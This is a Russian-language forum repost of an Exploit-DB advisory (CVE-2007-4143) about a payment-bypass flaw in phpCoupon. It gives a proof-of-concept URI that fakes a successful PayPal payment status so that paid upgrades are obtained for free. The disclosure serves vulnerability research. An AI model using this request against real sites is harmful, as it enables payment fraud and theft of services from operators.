Exploit phpCoupon - Remote Payment Bypass

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30429
Проверка EDB
  1. Пройдено
Автор
FREEPROTECT.NET
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4143
Дата публикации
2007-07-28
Код:
source: https://www.securityfocus.com/bid/25116/info

phpCoupon is prone to a remote payment-bypass vulnerability because the application fails to properly secure PayPal payment transactions.

Successfully exploiting this issue allows remote attackers to perform payment transactions in the application without actually paying money. This allows them to obtain services for free. 

The following URI demonstrates this issue:

http://www.example.com/path/user.php?REQ=auth&billing=141&status=success&custom=upgrade5

The '141' and the 'upgrade5' values may vary from installation to installation.
 
Источник
www.exploit-db.com

Похожие темы